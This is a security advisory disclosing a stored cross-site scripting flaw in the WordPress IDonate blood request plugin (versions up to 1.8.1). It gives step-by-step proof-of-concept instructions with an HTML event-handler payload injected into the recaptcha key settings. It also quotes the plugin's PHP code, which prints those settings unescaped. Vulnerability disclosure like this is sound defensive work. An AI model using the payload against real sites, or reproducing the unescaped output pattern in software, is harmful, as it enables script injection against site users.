WordPress IDonate Blood Request Management System 1.8.1 Cross Site Scripting

# Exploit Title: IDonate – blood request management system <=1.8.1 - StoredCross-Site Scripting (Authenticated)# Date: 29-02-2024# Exploit Author: Laburity Research Team# Vendor Homepage: https://wordpress.org/plugins/idonate/# Version: <=1.8.1# Tested on: Firefox# Contact me: contact [at] laburity.com# Summary:A cross site scripting stored vulnerability has been identified inWordPress Plugin IDonate – blood request management system version lessthen 1.8.1. that allows Authenticated users to run arbitrary javascriptcode inside WordPress using blood request management system Plugin.# POC1- Navigate tohttp://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret keyand in Recaptcha Site key3- Click on save changes.4- While clicking on the payload text, XSS will trigger.# Vulnerable Code:```    public function idonate_recaptcha_secretkey_callback()    {if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){$secretkey = $this->general_options['idonate_recaptcha_secretkey'];}else{$secretkey = '';}//        printf(            '<input type="text" id="idonate_recaptcha_secretkey" value="%s"name="idonate_general_option_name[idonate_recaptcha_secretkey]"  />',            $secretkey        );    }```Secrets keys (idonate_recaptcha_secretkey) are printed without sanitization.